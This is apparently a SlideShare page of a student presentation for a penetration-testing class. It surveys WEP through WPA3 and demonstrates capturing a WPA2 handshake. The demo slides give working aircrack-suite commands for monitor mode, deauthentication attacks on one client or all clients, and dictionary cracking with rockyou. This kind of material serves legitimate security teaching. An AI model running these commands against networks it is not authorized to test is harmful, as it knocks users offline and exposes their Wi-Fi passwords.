SlideShare une entreprise Scribd logo

Wireless Pentest & Capturing a WPA2 Four-Way Handshake

D
data68

Wireless penetration testing presentation for my penetration testing class. Captured a WPA2 four-way handshake.

Formation
1  sur  16
Wireless Network Penetration Testing Capturing a WPA2 Four-Way Handshake Tina Ellis CSIA 440 Cyber Test & Penetration May 10, 2023
Background Wireless penetration tests, commonly known as wireless pentests, typically assess three main aspects of a wireless network: • Range • Data Security • Unauthorized Access
3 Wireless Network Penetration Testing Wired Equivalent Privacy (WEP) The Evolution of WLAN Security • 802.11 – First Wireless Local Area Network (WLAN) standard • Open System Authentication (OSA) • Shared Key Authentication (SKA) • Pre-Shared Key (PSK) 64 – 128 bits • PSK sent in plain text • WEP protocol should not be used 3.59% of networks still use WEP – WiGLE.net/stats
4 Wireless Network Penetration Testing Wi-Fi Protected Access (WPA) The Evolution of WLAN Security • Established by the Wi-Fi Alliance, under 802.11i • Pre-Shared Key (PSK) 256 bits and salted • Temporal Key Integrity Protocol (TKIP) • WPA Personal • Launched hastily • Should not be used 3.48% of networks still use WPA – WiGLE.net/stats
5 Wireless Network Penetration Testing Wi-Fi Protected Access 2 (WPA2) The Evolution of WLAN Security • Second WLAN standard established by the Wi-Fi Alliance, under 802.11i • Significant advancement in security over WPA • Advanced Encryption Standard (AES) 128 bits • Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCM Protocol or CCMP) • Management Frame Protection (MFP) for enterprise • Susceptible to deauthentication attacks 73.09% of networks use WPA2 – WiGLE.net/stats
6 Wireless Network Penetration Testing Wi-Fi Protected Access 3 (WPA3) The Evolution of WLAN Security • Third WLAN standard established by the Wi-Fi Alliance, under 802.11ax • Diffie-Hellman Key Exchange • Personal and Enterprise • Personal: CCMP-128 (AES-128 in CCM mode) • Enterprise: Restricts algorithms used 192- bit keys (AES-256 in GCM mode with SHA-384 as HMAC) • Not supported by older/embedded interfaces • Downgrade/side-channel attacks 0.32% of networks use WPA3 – WiGLE.net/stats
Wireless Testing Equipment • Laptop • Kali Linux OS • Wireless Adapter 1. Atheros AR9271 2. Ralink RT3070 3. Ralink RT3572 • Wireless Router • Wireless Client (to generate traffic) 7 Wireless Network Penetration Testing Pictured: TP-Link AC1900 Archer T9UH
Cracking WPA2-PSK Background How the four-way handshake works 1. AP → Client (Message 1): AP sends a ANonce) to the client 2. Client → AP (Message 2): The client creates a SNonce, some hashes, and sends the SNonce & ANonce back to the AP 3. AP → Client (Message 3): The AP sends a confirmation with the ANonce, SNonce, and hashes, back to the client 4. Client → AP (Message 4): The client sends the AP a confirmation 8 DEMO PRE- GAME How de-authentication works When a device wants to disconnect, it sends a deauthentication frame to the AP. This is a normal part of Wi-Fi operation. Deauth Attacks • Attacker sends fraudulent deauthentication frames to a target device • Frames pretend to be from the AP • Device disconnects and attempts to reconnect to the AP
Pre- Configuration VirtualBox 9 DEMO Kali Verify the USB Wi-Fi adapter is recognized in the system • lsusb Identify the name of your Wi-Fi adapter • iwconfig
Wireless Scanning & Discovery Enable monitor mode on the wireless interface card • sudo airmon-ng start wlan0 Identify the channel your target AP is operating on Note the BSSID (MAC address), Channel, and the ESSID (Network Name). Once you’ve identified the AP information, use CTRL-C to exit. • sudo airodump-ng wlan0 10 DEMO
Capture Four-Way Handshake With monitor mode enabled on the wireless interface card, start airodump-ng • sudo airodump-ng -c 149 --bssid <macaddress> -w handshake wlan0 As wireless clients connect to this AP, they will appear under the STATION column and will report the BSSID of the AP they are connecting to. 11 DEMO
12 Real life picture of me waiting to passively capture a four-way handshake Capture Four-Way Handshake DEMO
Deauth- Attack In a separate terminal, run aireplay-ng • sudo aireplay-ng -0 5 -a <apmacaddress> -c <clientmacaddress> wlan0 If you don't know the MAC address of a specific client, you can still send deauthentication packets to all clients connected to the AP. You do this by omitting the `-c` option from your command: • sudo aireplay-ng -0 5 -a <apmacaddress> wlan0 13 DEMO
Capture Four-Way Handshake 14 DEMO Success! In your four-way handshake airodump-ng terminal, you will know when you have captured the four-way handshake when you see the "WPA handshake" message next to the target BSSID. This took several tries.
Dictionary Attack Using the rockyou wordlist aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <apmacaddress> <name of outputfile> *Make sure you specify the .cap output file that was generated 15 DEMO
Summary • The Evolution of WLAN Security • Wired Equivalent Privacy (WEP) • Wi-Fi Protected Access (WPA) • Wi-Fi Protected Access 2 (WPA2) • Wi-Fi Protected Access 3 (WPA3) • Wireless Testing Equipment • Wireless Scanning & Discovery (Aircrack) • Capturing a WPA2 Four-Way Handshake • Deauthentication attacks • Dictionary attacks 16 Wireless Network Penetration Testing

Recommandé

Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentestingMihir Shah
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingMihir Shah
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_kRama Krishna M
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!edwardo
 
WPA3 - What is it good for?
WPA3 - What is it good for?WPA3 - What is it good for?
WPA3 - What is it good for?Tom Isaacson
 
Hacking wireless networks
Hacking wireless networksHacking wireless networks
Hacking wireless networksSahil Rai
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 

Recommandé

Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentestingMihir Shah
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingMihir Shah
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_kRama Krishna M
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!edwardo
 
WPA3 - What is it good for?
WPA3 - What is it good for?WPA3 - What is it good for?
WPA3 - What is it good for?Tom Isaacson
 
Hacking wireless networks
Hacking wireless networksHacking wireless networks
Hacking wireless networksSahil Rai
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Securityamiable_indian
 
Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008ClubHack
 
WLAN SECURITY BY SAIKIRAN PANJALA
WLAN SECURITY BY SAIKIRAN PANJALAWLAN SECURITY BY SAIKIRAN PANJALA
WLAN SECURITY BY SAIKIRAN PANJALASaikiran Panjala
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingarushi bhatnagar
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kalin|u - The Open Security Community
 
Wi-Fi Module
Wi-Fi ModuleWi-Fi Module
Wi-Fi ModuleMohsen Sarakbi
 
4 wifi security
4 wifi security4 wifi security
4 wifi securityal-sari7
 
Shashank wireless lans security
Shashank wireless lans securityShashank wireless lans security
Shashank wireless lans securityShashank Srivastava
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Amazon Web Services
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksHammam Samara
 
Computer Security - CCNA Security - Lecture 2
Computer Security - CCNA Security - Lecture 2Computer Security - CCNA Security - Lecture 2
Computer Security - CCNA Security - Lecture 2Mohamed Loey
 
Ccna 3 chapter 7 v4.0 answers 2011
Ccna 3 chapter 7 v4.0 answers 2011Ccna 3 chapter 7 v4.0 answers 2011
Ccna 3 chapter 7 v4.0 answers 2011Dân Chơi
 
Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Shrobon Biswas
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security Hariraj Rathod
 
Wireless lan security(10.8)
Wireless lan security(10.8)Wireless lan security(10.8)
Wireless lan security(10.8)SubashiniRathinavel
 
UNIT-2 PPT Data link layer.pptx
UNIT-2 PPT Data link layer.pptxUNIT-2 PPT Data link layer.pptx
UNIT-2 PPT Data link layer.pptxdiptijilhare
 
Resilience in the ZigBee Residential Mode
Resilience in the ZigBee Residential ModeResilience in the ZigBee Residential Mode
Resilience in the ZigBee Residential ModeAleph Tav Technologies Private Limited
 
Wireless network security
Wireless network securityWireless network security
Wireless network securityVishal Agarwal
 
Chapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxChapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxAmanuelZewdie4
 
Nexus 1000v part ii
Nexus 1000v part iiNexus 1000v part ii
Nexus 1000v part iiKrunal Shah
 
Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network SecurityInformation Technology
 
YOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptx
YOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptxYOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptx
YOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptxConquiztadors- the Quiz Society of Sri Venkateswara College
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 

Contenu connexe

Similaire à Wireless Pentest & Capturing a WPA2 Four-Way Handshake

Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008ClubHack
 
WLAN SECURITY BY SAIKIRAN PANJALA
WLAN SECURITY BY SAIKIRAN PANJALAWLAN SECURITY BY SAIKIRAN PANJALA
WLAN SECURITY BY SAIKIRAN PANJALASaikiran Panjala
 
4 wifi security
4 wifi security4 wifi security
4 wifi securityal-sari7
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Amazon Web Services
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksHammam Samara
 
Computer Security - CCNA Security - Lecture 2
Computer Security - CCNA Security - Lecture 2Computer Security - CCNA Security - Lecture 2
Computer Security - CCNA Security - Lecture 2Mohamed Loey
 
Ccna 3 chapter 7 v4.0 answers 2011
Ccna 3 chapter 7 v4.0 answers 2011Ccna 3 chapter 7 v4.0 answers 2011
Ccna 3 chapter 7 v4.0 answers 2011Dân Chơi
 
Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Shrobon Biswas
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security Hariraj Rathod
 
UNIT-2 PPT Data link layer.pptx
UNIT-2 PPT Data link layer.pptxUNIT-2 PPT Data link layer.pptx
UNIT-2 PPT Data link layer.pptxdiptijilhare
 
Wireless network security
Wireless network securityWireless network security
Wireless network securityVishal Agarwal
 
Chapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxChapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxAmanuelZewdie4
 
Nexus 1000v part ii
Nexus 1000v part iiNexus 1000v part ii
Nexus 1000v part iiKrunal Shah
 

Similaire à Wireless Pentest & Capturing a WPA2 Four-Way Handshake (20)

Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008Sheetal - Wirelesss Hacking - ClubHack2008
Sheetal - Wirelesss Hacking - ClubHack2008
 
WLAN SECURITY BY SAIKIRAN PANJALA
WLAN SECURITY BY SAIKIRAN PANJALAWLAN SECURITY BY SAIKIRAN PANJALA
WLAN SECURITY BY SAIKIRAN PANJALA
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kali
 
Wi-Fi Module
Wi-Fi ModuleWi-Fi Module
Wi-Fi Module
 
4 wifi security
4 wifi security4 wifi security
4 wifi security
 
Shashank wireless lans security
Shashank wireless lans securityShashank wireless lans security
Shashank wireless lans security
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
 
Computer Security - CCNA Security - Lecture 2
Computer Security - CCNA Security - Lecture 2Computer Security - CCNA Security - Lecture 2
Computer Security - CCNA Security - Lecture 2
 
Ccna 3 chapter 7 v4.0 answers 2011
Ccna 3 chapter 7 v4.0 answers 2011Ccna 3 chapter 7 v4.0 answers 2011
Ccna 3 chapter 7 v4.0 answers 2011
 
Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study )
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security
 
Wireless lan security(10.8)
Wireless lan security(10.8)Wireless lan security(10.8)
Wireless lan security(10.8)
 
UNIT-2 PPT Data link layer.pptx
UNIT-2 PPT Data link layer.pptxUNIT-2 PPT Data link layer.pptx
UNIT-2 PPT Data link layer.pptx
 
Resilience in the ZigBee Residential Mode
Resilience in the ZigBee Residential ModeResilience in the ZigBee Residential Mode
Resilience in the ZigBee Residential Mode
 
Wireless network security
Wireless network securityWireless network security
Wireless network security
 
Chapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptxChapter 7 - Wireless Network Security.pptx
Chapter 7 - Wireless Network Security.pptx
 
Nexus 1000v part ii
Nexus 1000v part iiNexus 1000v part ii
Nexus 1000v part ii
 
Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network Security
 

Dernier

Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 
Choosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for ParentsChoosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for Parentsnavabharathschool99
 
What is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPWhat is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPCeline George
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Seán Kennedy
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Celine George
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxAnupkumar Sharma
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4JOYLYNSAMANIEGO
 
Full Stack Web Development Course for Beginners
Full Stack Web Development Course for BeginnersFull Stack Web Development Course for Beginners
Full Stack Web Development Course for BeginnersSabitha Banu
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxiammrhaywood
 
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYKayeClaireEstoconing
 
ROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptxROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptxVanesaIglesias10
 
4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptxmary850239
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfVanessa Camilleri
 
Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Mark Reed
 
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxHumphrey A Beña
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Celine George
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4MiaBumagat1
 
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)lakshayb543
 

Dernier (20)

YOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptx
YOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptxYOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptx
YOUVE GOT EMAIL_FINALS_EL_DORADO_2024.pptx
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 
Choosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for ParentsChoosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for Parents
 
LEFT_ON_C'N_ PRELIMS_EL_DORADO_2024.pptx
LEFT_ON_C'N_ PRELIMS_EL_DORADO_2024.pptxLEFT_ON_C'N_ PRELIMS_EL_DORADO_2024.pptx
LEFT_ON_C'N_ PRELIMS_EL_DORADO_2024.pptx
 
What is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPWhat is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERP
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4
 
Full Stack Web Development Course for Beginners
Full Stack Web Development Course for BeginnersFull Stack Web Development Course for Beginners
Full Stack Web Development Course for Beginners
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
 
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITYISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
ISYU TUNGKOL SA SEKSWLADIDA (ISSUE ABOUT SEXUALITY
 
ROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptxROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptx
 
4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdf
 
Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)Influencing policy (training slides from Fast Track Impact)
Influencing policy (training slides from Fast Track Impact)
 
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptxINTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
INTRODUCTION TO CATHOLIC CHRISTOLOGY.pptx
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
 
ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4ANG SEKTOR NG agrikultura.pptx QUARTER 4
ANG SEKTOR NG agrikultura.pptx QUARTER 4
 
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
 

Wireless Pentest & Capturing a WPA2 Four-Way Handshake

  • 1. Wireless Network Penetration Testing Capturing a WPA2 Four-Way Handshake Tina Ellis CSIA 440 Cyber Test & Penetration May 10, 2023
  • 2. Background Wireless penetration tests, commonly known as wireless pentests, typically assess three main aspects of a wireless network: • Range • Data Security • Unauthorized Access
  • 3. 3 Wireless Network Penetration Testing Wired Equivalent Privacy (WEP) The Evolution of WLAN Security • 802.11 – First Wireless Local Area Network (WLAN) standard • Open System Authentication (OSA) • Shared Key Authentication (SKA) • Pre-Shared Key (PSK) 64 – 128 bits • PSK sent in plain text • WEP protocol should not be used 3.59% of networks still use WEP – WiGLE.net/stats
  • 4. 4 Wireless Network Penetration Testing Wi-Fi Protected Access (WPA) The Evolution of WLAN Security • Established by the Wi-Fi Alliance, under 802.11i • Pre-Shared Key (PSK) 256 bits and salted • Temporal Key Integrity Protocol (TKIP) • WPA Personal • Launched hastily • Should not be used 3.48% of networks still use WPA – WiGLE.net/stats
  • 5. 5 Wireless Network Penetration Testing Wi-Fi Protected Access 2 (WPA2) The Evolution of WLAN Security • Second WLAN standard established by the Wi-Fi Alliance, under 802.11i • Significant advancement in security over WPA • Advanced Encryption Standard (AES) 128 bits • Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCM Protocol or CCMP) • Management Frame Protection (MFP) for enterprise • Susceptible to deauthentication attacks 73.09% of networks use WPA2 – WiGLE.net/stats
  • 6. 6 Wireless Network Penetration Testing Wi-Fi Protected Access 3 (WPA3) The Evolution of WLAN Security • Third WLAN standard established by the Wi-Fi Alliance, under 802.11ax • Diffie-Hellman Key Exchange • Personal and Enterprise • Personal: CCMP-128 (AES-128 in CCM mode) • Enterprise: Restricts algorithms used 192- bit keys (AES-256 in GCM mode with SHA-384 as HMAC) • Not supported by older/embedded interfaces • Downgrade/side-channel attacks 0.32% of networks use WPA3 – WiGLE.net/stats
  • 7. Wireless Testing Equipment • Laptop • Kali Linux OS • Wireless Adapter 1. Atheros AR9271 2. Ralink RT3070 3. Ralink RT3572 • Wireless Router • Wireless Client (to generate traffic) 7 Wireless Network Penetration Testing Pictured: TP-Link AC1900 Archer T9UH
  • 8. Cracking WPA2-PSK Background How the four-way handshake works 1. AP → Client (Message 1): AP sends a ANonce) to the client 2. Client → AP (Message 2): The client creates a SNonce, some hashes, and sends the SNonce & ANonce back to the AP 3. AP → Client (Message 3): The AP sends a confirmation with the ANonce, SNonce, and hashes, back to the client 4. Client → AP (Message 4): The client sends the AP a confirmation 8 DEMO PRE- GAME How de-authentication works When a device wants to disconnect, it sends a deauthentication frame to the AP. This is a normal part of Wi-Fi operation. Deauth Attacks • Attacker sends fraudulent deauthentication frames to a target device • Frames pretend to be from the AP • Device disconnects and attempts to reconnect to the AP
  • 9. Pre- Configuration VirtualBox 9 DEMO Kali Verify the USB Wi-Fi adapter is recognized in the system • lsusb Identify the name of your Wi-Fi adapter • iwconfig
  • 10. Wireless Scanning & Discovery Enable monitor mode on the wireless interface card • sudo airmon-ng start wlan0 Identify the channel your target AP is operating on Note the BSSID (MAC address), Channel, and the ESSID (Network Name). Once you’ve identified the AP information, use CTRL-C to exit. • sudo airodump-ng wlan0 10 DEMO
  • 11. Capture Four-Way Handshake With monitor mode enabled on the wireless interface card, start airodump-ng • sudo airodump-ng -c 149 --bssid <macaddress> -w handshake wlan0 As wireless clients connect to this AP, they will appear under the STATION column and will report the BSSID of the AP they are connecting to. 11 DEMO
  • 12. 12 Real life picture of me waiting to passively capture a four-way handshake Capture Four-Way Handshake DEMO
  • 13. Deauth- Attack In a separate terminal, run aireplay-ng • sudo aireplay-ng -0 5 -a <apmacaddress> -c <clientmacaddress> wlan0 If you don't know the MAC address of a specific client, you can still send deauthentication packets to all clients connected to the AP. You do this by omitting the `-c` option from your command: • sudo aireplay-ng -0 5 -a <apmacaddress> wlan0 13 DEMO
  • 14. Capture Four-Way Handshake 14 DEMO Success! In your four-way handshake airodump-ng terminal, you will know when you have captured the four-way handshake when you see the "WPA handshake" message next to the target BSSID. This took several tries.
  • 15. Dictionary Attack Using the rockyou wordlist aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <apmacaddress> <name of outputfile> *Make sure you specify the .cap output file that was generated 15 DEMO
  • 16. Summary • The Evolution of WLAN Security • Wired Equivalent Privacy (WEP) • Wi-Fi Protected Access (WPA) • Wi-Fi Protected Access 2 (WPA2) • Wi-Fi Protected Access 3 (WPA3) • Wireless Testing Equipment • Wireless Scanning & Discovery (Aircrack) • Capturing a WPA2 Four-Way Handshake • Deauthentication attacks • Dictionary attacks 16 Wireless Network Penetration Testing